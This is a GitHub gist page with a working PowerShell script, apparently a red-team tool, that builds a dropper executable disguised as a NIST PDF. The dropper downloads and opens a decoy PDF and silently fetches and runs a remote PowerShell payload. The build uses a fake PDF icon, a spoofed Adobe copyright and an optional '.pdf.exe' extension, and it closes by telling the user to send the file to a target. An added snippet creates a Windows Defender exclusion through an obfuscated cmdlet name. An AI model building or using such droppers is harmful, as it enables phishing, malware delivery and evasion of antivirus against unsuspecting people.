Last active
June 2, 2025 07:43
-
-
Save r00t-3xp10it/a18237b299a6efb6c39c72d0a7f6aa2d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Create dropper.EXE that downloads\Open NIST.SP.800-12r1.PDF (decoy) and EXecutes Payload.ps1 | |
| Author: @r00t-3xp10it | |
| Tested Under: Windows 11 (26100) x64 bits | |
| Required Dependencies: ps2exe.ps1 | |
| Optional Dependencies: Rename-Item | |
| PS cmdlet Dev version: v1.1.9 | |
| .DESCRIPTION | |
| This script demonstrates how to social enginnering target | |
| user to download\Execute Payload.ps1 in background while | |
| also downloading and executing one PDF file (decoy file) | |
| .NOTES | |
| Payload.ps1 only displays one MSG to demonstrate that its executed successfuly. | |
| Warning: Spoofing dropper extension (NIST.SP.800-12r1.pdf.exe) migth trigger AV detection. | |
| .Parameter PDFfile | |
| The legit NIST.SP.800-12r1.PDF download url link | |
| .Parameter PayloadFile | |
| The Payload.ps1 file download url link | |
| .Parameter SpoofExtension | |
| Spoof NIST.SP.800-12r1.exe extension? (NIST.SP.800-12r1.pdf.exe) | |
| .Parameter DelayExecution | |
| The delay time (seconds) between PDFfile and PayloadFile execution | |
| .EXAMPLE | |
| PS> .\FakePDF.ps1 -DelayExecution "3" -SpoofExtension | |
| Create dropper file (NIST.SP.800-12r1.pdf.exe) that downloads\Executes (NIST.SP.800-12r1.pdf) and downloads\Executes (Payload.ps1) | |
| .EXAMPLE | |
| PS> .\FakePDF.ps1 -PDFfile "https://www.ftc.gov/system/files/attachments/cybersecurity-small-business/cybersecuirty_sb_factsheets_all.pdf" | |
| Create dropper file (cybersecuirty_sb_factsheets_all.exe) that downloads\Executes (cybersecuirty_sb_factsheets_all.pdf) and downloads\Executes (Payload.ps1) | |
| .EXAMPLE | |
| PS> .\FakePDF.ps1 -PayloadFile "https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload.ps1" | |
| Create dropper file (NIST.SP.800-12r1.exe) that downloads\Executes (NIST.SP.800-12r1.pdf) and downloads\Executes (Payload.ps1) | |
| .OUTPUTS | |
| .%%%%%%...%%%%...%%..%%..%%%%%%..........%%%%%...%%%%%...%%%%%%. | |
| .%%......%%..%%..%%.%%...%%..............%%..%%..%%..%%..%%..... | |
| .%%%%....%%%%%%..%%%%....%%%%............%%%%%...%%..%%..%%%%... | |
| .%%......%%..%%..%%.%%...%%..............%%......%%..%%..%%..... | |
| .%%......%%..%%..%%..%%..%%%%%%..........%%......%%%%%...%%..... | |
| ................................................................ | |
| Author: @r00t-3xp10it - SSA_redteam @2025 v1.1.8 | |
| This script demonstrates how to social enginnering target | |
| user to download\Execute Payload.ps1 in background while | |
| also downloading and executing one PDF file (decoy file) | |
| [*] Generated pdf version number: 3.55.33.27 | |
| [*] Creating dropper file [MyScriptGUI.ps1] | |
| [*] Download PDF icon file [PDFicon.ico] | |
| [*] Download ps2exe.ps1 [Compile from PS1 to EXE] | |
| [*] Compiling MyScriptGUI.ps1 to NIST.SP.800-12r1.exe and change the icon to .PDF | |
| PS2EXE-GUI v0.5.0.21 by Ingo Karstein, reworked and GUI support by Markus Scholtes | |
| You are using PowerShell 4.0 or above. | |
| Reading input file C:\Users\pedro\onedrive\Ambiente de Trabalho\MyScriptGUI.ps1 | |
| Compiling file... | |
| Output file C:\Users\pedro\onedrive\Ambiente de Trabalho\NIST.SP.800-12r1.exe written | |
| [*] Send NIST.SP.800-12r1.exe [3.55.33.27] to target user! | |
| .LINK | |
| https://github.com/r00t-3xp10it | |
| https://gist.github.com/r00t-3xp10it/a18237b299a6efb6c39c72d0a7f6aa2d | |
| #> | |
| [CmdletBinding(PositionalBinding=$false)] param( | |
| [string]$PayloadFile="https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload.ps1", | |
| [string]$PDFfile="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-12r1.pdf", | |
| [string]$DelayExecution="3", | |
| [switch]$SpoofExtension | |
| ) | |
| ## Local variables | |
| $CmdLetVersion = "v1.1.9" | |
| $StartPath = (Get-Location).Path | |
| $ErrorActionPreference = "SilentlyContinue" | |
| $host.UI.RawUI.WindowTitle = "FakePdf $CmdLetVersion" | |
| ## Script Banner | |
| $StartBanner = @" | |
| .%%%%%%...%%%%...%%..%%..%%%%%%..........%%%%%...%%%%%...%%%%%%. | |
| .%%......%%..%%..%%.%%...%%..............%%..%%..%%..%%..%%..... | |
| .%%%%....%%%%%%..%%%%....%%%%............%%%%%...%%..%%..%%%%... | |
| .%%......%%..%%..%%.%%...%%..............%%......%%..%%..%%..... | |
| .%%......%%..%%..%%..%%..%%%%%%..........%%......%%%%%...%%..... | |
| ................................................................ | |
| Author: @r00t-3xp10it - SSA_redteam @2025 $CmdLetVersion | |
| This script demonstrates how to social enginnering target | |
| user to download\Execute Payload.ps1 in background while | |
| also downloading and executing one PDF file (decoy file) | |
| "@; | |
| write-host $StartBanner -ForegroundColor Blue | |
| Start-Sleep -Milliseconds 500 | |
| echo "" | |
| ## Generating pdf version number | |
| write-host "[*] " -ForeGroundColor Blue -NoNewLine | |
| $PdfVersionNumber = (1..90|Get-Random -Count 3) -join "." | |
| write-host "Generated pdf version number: " -NoNewLine | |
| write-host "3.${PdfVersionNumber}" -ForeGroundColor Yellow | |
| ## Make sure -PDFfile variable contains one valid URL link | |
| If(($PDFfile -iNotMatch '^(http(s)://)') -or ($PDFfile -iNotMatch '(.pdf)$')) | |
| { | |
| write-host "[x] error: -PDFfile 'url' must be one valid URL link" -ForeGroundColor Red | |
| write-host "[*] example: " -ForeGroundColor Blue -NoNewLine | |
| write-host "https://" -ForeGroundColor Green -NoNewLine | |
| write-host "nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-12r1" -NoNewLine | |
| write-host ".pdf" -ForeGroundColor Green;echo "" | |
| return | |
| } | |
| ## Make sure -PayloadFile variable contains one valid URL link | |
| If(($PayloadFile -iNotMatch '^(http(s)://)') -or ($PayloadFile -iNotMatch '(.ps1)$')) | |
| { | |
| write-host "[x] error: -PayloadFile 'url' must be one valid URL link" -ForeGroundColor Red | |
| write-host "[*] example: " -ForeGroundColor Blue -NoNewLine | |
| write-host "https://" -ForeGroundColor Green -NoNewLine | |
| write-host "raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload" -NoNewLine | |
| write-host ".ps1" -ForeGroundColor Green;echo "" | |
| return | |
| } | |
| ## Extract filename from PDFfile variable path | |
| $PdfName = [System.IO.Path]::GetFileNameWithoutExtension($PDFfile) | |
| If([string]::IsNullOrEmpty($PdfName)) | |
| { | |
| write-host "[x] error: fail to extract filename from -PDFfile 'url' path." -ForeGroundColor Red | |
| $PDFfile = "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-12r1.pdf" | |
| $PdfName = "NIST.SP.800-12r1" ## ReDefine PDF filename | |
| Start-Sleep -Seconds 1 | |
| } | |
| ## Extract filename from PayloadFile variable path | |
| $PayloadName = [System.IO.Path]::GetFileNameWithoutExtension($PayloadFile) | |
| If([string]::IsNullOrEmpty($PayloadName)) | |
| { | |
| write-host "[x] error: fail to extract filename from -PayloadFile 'url' path." -ForeGroundColor Red | |
| $PayloadFile = "https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload.ps1" | |
| $PayloadName = "Payload" ## ReDefine payload filename | |
| Start-Sleep -Seconds 1 | |
| } | |
| ## Dropper file (Download\Execute NIST.pdf and payload.PS1) | |
| $PS1File = @("iwr -Uri `"$PDFfile`" -OutFile `"${PdfName}.pdf`"|Unblock-File | |
| .\${PdfName}.pdf | |
| Start-Sleep -Seconds $DelayExecution | |
| iwr -Uri `"$PayloadFile`" -OutFile `"${PayloadName}.ps1`"|Unblock-File | |
| .\${PayloadName}.ps1") | |
| ## Create dropper file | |
| write-host "[*] " -ForegroundColor Blue -NoNewline | |
| write-host "Creating dropper file [MyScriptGUI.ps1]" | |
| echo $PS1File|Out-File "$StartPath\MyScriptGUI.ps1" -Encoding string -Force | |
| Start-Sleep -Seconds 1 | |
| ## Check if file has created | |
| If(-not(Test-Path -Path "$StartPath\MyScriptGUI.ps1" -EA SilentlyContinue)) | |
| { | |
| Write-Host "[x] error: fail to create $StartPath\MyScriptGUI.ps1" -ForegroundColor Red;echo "" | |
| return | |
| } | |
| ## Download PDF icon | |
| write-host "[*] " -ForegroundColor Blue -NoNewline | |
| write-host "Download PDF icon file [PDFicon.ico]" | |
| iwr -Uri "https://raw.githubusercontent.com/r00t-3xp10it/FakeImageExploiter/refs/heads/master/icons/PDF_24287.ico" -OutFile "$StartPath\PDFicon.ico"|Unblock-File | |
| Start-Sleep -Seconds 1 | |
| ## Check if file has downloaded | |
| If(-not(Test-Path -Path "$StartPath\PDFicon.ico" -EA SilentlyContinue)) | |
| { | |
| Write-Host "[x] error: fail to download $StartPath\PDFicon.ico" -ForegroundColor Red;echo "" | |
| return | |
| } | |
| ## Download ps1 to exe | |
| write-host "[*] " -ForegroundColor Blue -NoNewline | |
| write-host "Download ps2exe.ps1 [compile from PS1 to EXE]" | |
| iwr -Uri "https://raw.githubusercontent.com/r00t-3xp10it/PandoraBox/refs/heads/master/PandoraBox/PS2EXE/ps2exe.ps1" -OutFile "$StartPath\ps2exe.ps1"|Unblock-File | |
| Start-Sleep -Seconds 1 | |
| ## Check if file has downloaded | |
| If(-not(Test-Path -Path "$StartPath\ps2exe.ps1" -EA SilentlyContinue)) | |
| { | |
| Write-Host "[x] error: fail to download $StartPath\ps2exe.ps1" -ForegroundColor Red;echo "" | |
| return | |
| } | |
| ## Compile MyScriptGUI.ps1 to NIST.exe | |
| write-host "[*] " -ForegroundColor Blue -NoNewline | |
| write-host "Compiling MyScriptGUI.ps1 to ${PdfName}.exe and change the icon to .PDF";echo "" | |
| ## The Compiling of dropper.PS1 to dropper.EXE (and change icon) its made by invoking ps2exe.ps1 script by: 'Ingo Karstein' | |
| .\ps2exe.ps1 -inputFile "$StartPath\MyScriptGUI.ps1" -outputFile "$StartPath\${PdfName}.exe" -iconFile "$StartPath\PDFicon.ico" -title "$PdfName" -product "$PdfName" -copyright "Adobe Systems" -version "3.${PdfVersionNumber}" -noConsole -noError | |
| Start-Sleep -Seconds 2 | |
| ## Check if file has created | |
| If(-not(Test-Path -Path "$StartPath\${PdfName}.exe" -EA SilentlyContinue)) | |
| { | |
| Write-Host "[x] error: fail to create $StartPath\${PdfName}.exe" -ForegroundColor Red;echo "" | |
| return | |
| } | |
| ## Spoof dropper extension? | |
| If($SpoofExtension.IsPresent) | |
| { | |
| write-host "[*] " -ForegroundColor Blue -NoNewline | |
| write-host "Spoofing file extension (${PdfName}.pdf.exe)" | |
| Rename-Item -Path "$StartPath\${PdfName}.exe" -NewName "$StartPath\${PdfName}.pdf.exe" -Force | |
| Start-Sleep -Seconds 2 | |
| ## Check if file has created | |
| If(-not(Test-Path -Path "$StartPath\${PdfName}.pdf.exe" -EA SilentlyContinue)) | |
| { | |
| Write-Host "[x] error: fail to create $StartPath\${PdfName}.pdf.exe" -ForegroundColor Red;echo "" | |
| return | |
| } | |
| } | |
| ## Final msg | |
| write-host "[*] " -ForegroundColor Blue -NoNewline | |
| If($SpoofExtension.IsPresent) | |
| { | |
| write-host "Send " -NoNewLine | |
| write-host "${PdfName}.pdf.exe " -ForegroundColor Yellow -NoNewLine | |
| write-host "[3.${PdfVersionNumber}] to target user!" | |
| } | |
| Else | |
| { | |
| write-host "Send " -NoNewLine | |
| write-host "${PdfName}.exe " -ForegroundColor Yellow -NoNewLine | |
| write-host "[3.${PdfVersionNumber}] to target user!" | |
| } | |
| ## CLEAN UP | |
| remove-item -Path "$StartPath\ps2exe.ps1" -Force | |
| remove-item -Path "$StartPath\PDFicon.ico" -Force | |
| remove-item -Path "$StartPath\${PdfName}.pdf" -Force | |
| remove-item -Path "$StartPath\MyScriptGUI.ps1" -Force | |
| remove-item -Path "$StartPath\${PayloadName}.ps1" -Force | |
| echo "" |
## add code to beggining of $Ps1File var
cd $Env:TMP
## Make sure shell is running with administrator privileges
$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match "S-1-5-32-544")
If($IsClientAdmin -iNotMatch '^(True)$')
{
write-host " - " -ForegroundColor Red -NoNewline
write-host "Error: " -ForegroundColor DarkGray -NoNewline
write-host "Administrator privileges required ..`n" -ForegroundColor Red
return
}
## Create defender %TMP% exclusion
$CmdLime = "S@t-MpPr@f@r@nc@ -@xclusionPath" -replace '@','e'
Start-Process -WindowStyle Hidden powershell -ArgumentList "$CmdLime $Env:TMP -Force" -Wait
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Parameters List
* Document.PDF and Payload.PS1 must be stored in webserver to be downloaded by this script
Download script
Execute script (with default parameters)
Screenshot